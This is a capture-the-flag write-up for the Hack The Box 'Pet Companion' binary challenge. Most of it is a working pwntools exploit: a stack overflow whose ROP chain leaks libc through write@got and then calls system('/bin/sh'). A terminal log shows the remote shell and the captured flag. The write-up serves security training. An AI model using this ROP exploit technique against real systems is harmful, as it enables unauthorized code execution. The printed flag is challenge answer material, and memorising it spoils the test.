Pet Companion
Embark on a journey through this expansive reality, where survival hinges on battling foes. In your quest, a loyal companion is essential. Dogs, mutated and implanted with chips, become your customizable allies. Tailor your pet's demeanor—whether happy, angry, sad, or funny—to enhance your bond on this perilous adventure.
import sys

from pwn import *
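def start(argv=None, *a, **kw):
    """Launch the target under GDB, connect to a remote host, or run it locally.

    Selection is driven by pwntools' command-line flags: ``GDB`` attaches the
    debugger using the module-level ``gdbscript`` (an empty script if none is
    defined), ``REMOTE`` connects to ``sys.argv[1]:sys.argv[2]`` (pwntools
    removes the flag itself from ``sys.argv``, which is what lets the
    ``exploit.py REMOTE <host> <port>`` invocation map host/port to argv[1]/[2]),
    and otherwise the binary at ``exe`` is spawned locally.

    ``argv`` is a list of extra arguments appended after ``exe``; ``None`` means
    none (a ``None`` default avoids the shared mutable-default pitfall). Extra
    positional and keyword arguments are forwarded unchanged to the chosen
    pwntools constructor. Returns the resulting tube.
    """
    argv = [] if argv is None else list(argv)
    if args.GDB:
        # gdbscript is expected at module level; fall back to an empty script
        # rather than failing with a NameError when none has been set
        script = globals().get('gdbscript', '')
        return gdb.debug([exe] + argv, *a, gdbscript=script, **kw)
    if args.REMOTE:  # ('server', 'port')
        if len(sys.argv) < 3:
            raise SystemExit("usage: exploit.py REMOTE <host> <port>")
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    # Run locally
    return process([exe] + argv, *a, **kw)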
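# Set up pwntools for the correct architecture
exe = './pet_companion'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Enable verbose logging so we can see exactly what is being sent (info/debug)
context.log_level = 'info'

# ===========================================================
# EXPLOIT GOES HERE
# ===========================================================

# Lib-C library. Every offset used below (write, system, "/bin/sh") is only
# valid if this is the same libc build the target runs, so use the copy shipped
# with the challenge, not the host's own libc.
libc = ELF('libc.so.6')  # Local copy of the target's libc
# Bytes of padding from the start of the overflowed buffer to the saved return
# address (the flat() dict below places the chain at this offset)
offset = 72

# Start program
io = start()

# Gadgets (absolute addresses from ropper). These only work because the binary
# is loaded at a fixed base - a PIE build would need a text leak first.
ret = 0x4004de        # plain `ret`: prepend to the stage-2 chain if system()
                      # faults on a misaligned stack (movaps); not needed here
pop_rdi = 0x400743    # pop rdi; ret
pop_rsi = 0x400741    # pop rsi; pop r15; ret  (hence the duplicated value below)

# Stage 1: leak libc. Call write@plt with rsi = &write@got so the resolved libc
# address of write is sent back to us, then return into main for a second
# overflow. Only rsi is set explicitly; rdi (fd) and rdx (count) are whatever
# the program left behind, which the transcript shows is enough for a leak.
payload = flat({
    offset: [
        pop_rsi,
        elf.got.write,      # rsi = address to dump
        elf.got.write,      # filler consumed by the trailing pop r15
        elf.plt.write,
        elf.symbols.main,   # restart main so we can overflow again
    ]
})
io.sendlineafter(b'status: ', payload)

# Skip the program's own response lines that precede the leaked bytes
io.recvline()
io.recvline()
io.recvline()
# Read exactly the 6 significant bytes of the little-endian pointer and zero-pad
# to 8; recvn() blocks for all 6 instead of returning whatever happens to have
# arrived, so the leftover prompt of the restarted main stays in the buffer
got_write = unpack(io.recvn(6).ljust(8, b'\x00'))
info("leaked got_write: %#x", got_write)

# Subtract write's offset inside libc to get the libc base
libc.address = got_write - libc.symbols.write
info("libc_base: %#x", libc.address)
# The base must be page-aligned; anything else means the leak is not write's
# address or libc.so.6 does not match the target's build
if libc.address & 0xfff:
    log.error("libc base %#x is not page-aligned: bad leak or wrong libc", libc.address)

# Stage 2: system("/bin/sh")
info("system_addr: %#x", libc.symbols.system)
bin_sh = next(libc.search(b'/bin/sh\x00'))
info("bin_sh: %#x", bin_sh)

payload = flat({
    offset: [
        pop_rdi,
        bin_sh,
        libc.symbols.system,
    ]
})
# main has restarted, so wait for its prompt again instead of sending blind
io.sendlineafter(b'status: ', payload)

# Got Shell?
io.interactive()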
┌──(kali㉿kali)-[~/ctf/pwn/pet]
└─$ python exploit.py REMOTE 94.237.53.81 48634
[*] '/home/kali/ctf/pwn/pet/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to 94.237.53.81 on port 48634: Done
[*] leaked got_write: 0x7fc5bdb920f0
[*] libc_base: 0x7fc5bda82000
[*] system_addr: 0x7fc5bdad1420
[*] bin_sh: 0x7fc5bdc35d88
[*] Switching to interactive mode
[*] Configuring...
$ ls
flag.txt
glibc
pet_companion
$ cat flag.txt
HTB{c0nf1gur3_w3r_d0g}
$
HTB{c0nf1gur3_w3r_d0g}